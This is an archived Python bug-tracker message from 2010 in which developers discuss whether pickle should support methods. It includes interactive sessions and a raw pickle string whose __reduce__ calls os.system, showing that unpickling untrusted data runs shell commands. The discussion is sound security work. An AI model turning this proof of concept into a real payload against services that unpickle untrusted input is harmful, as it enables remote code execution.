[issue9276] pickle should support methods
Marc-Andre Lemburg
report at bugs.python.org
Mon Aug 2 16:11:31 CEST 2010
Marc-Andre Lemburg <mal at egenix.com> added the comment:
M.-A. Lemburg wrote:
> Jean-Paul Calderone wrote:
>>
>> Jean-Paul Calderone <exarkun at twistedmatrix.com> added the comment:
>>
>> For example:
>>
>> exarkun at boson:~$ python
>> Python 2.6.4 (r264:75706, Dec 7 2009, 18:45:15)
>> [GCC 4.4.1] on linux2
>> Type "help", "copyright", "credits" or "license" for more information.
>>>>> class x(object):
>> ... def __reduce__(self):
>> ... import os
>> ... return os.system, ('echo "Hello from sploitland"',)
>> ...
>>>>> import pickle
>>>>> pickle.loads(pickle.dumps(x()))
>> Hello from sploitland
>> 0
>
> But here you are not transferring malicious code in the pickle
> string, you are just triggering the execution of such code that
> you already have (and are in control of).
>
> Without the definition of class x on the receiving side, there
> would be no exploit.
>
> By adding support for pickling code objects, you'd make it possible
> to place the definition of class x into the pickle string and
> you would no longer be in control of that code.
Hmm, I just tried the code and it seems that you're right:
The pickle string does not contain a reference to class x,
but only the name of the function to call. Wow, that's a huge
hole in Python's pickle system...
... def __reduce__(self):
... import os
... return os.system, ('echo "Bingo"',)
...
>>> import pickle
>>> pickle.dumps(C())
'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> C = None
>>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> pickle.loads(s)
Bingo
0
----------
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue9276>
_______________________________________
More information about the Python-bugs-list
mailing list